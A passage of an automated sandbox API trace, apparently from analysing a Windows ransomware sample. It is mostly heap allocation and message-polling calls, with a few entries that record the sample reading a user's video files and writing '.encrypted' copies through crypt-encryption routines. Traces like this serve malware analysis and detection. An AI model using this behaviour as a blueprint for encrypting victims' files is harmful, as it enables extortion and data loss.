dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0042.951] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0042.952] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0042.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0042.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0042.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0042.953] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b")) returned 0x10 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0042.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.954] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.encrypted.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ejdsspxab.encrypted.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0042.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0042.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0042.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0042.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.954] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0042.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0042.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0042.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0042.955] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0042.955] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0042.955] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0042.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0042.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0042.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0042.955] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0042.955] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0042.958] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x82dc, lpOverlapped=0x0) returned 1 [0042.959] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0042.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x182dc) returned 0xac2018 [0042.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0042.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0042.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0042.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x182dc) returned 0x935008 [0042.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.963] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0042.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x182dc) returned 0xac2018 [0042.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0042.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.963] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0042.964] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.964] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0042.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x182dc) returned 0xac2018 [0042.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0042.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0042.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0042.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0042.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0042.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9b8 [0042.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0042.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0042.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0042.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x182dc) returned 0x94d2f0 [0042.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0042.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0042.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0042.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0042.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0042.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0042.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0042.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0042.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.966] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0042.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0042.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0042.967] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0042.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0042.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.967] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0042.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2f8 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0042.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7d8 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0042.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0042.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.968] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0042.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0042.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0042.968] CharLowerBuffW (in: 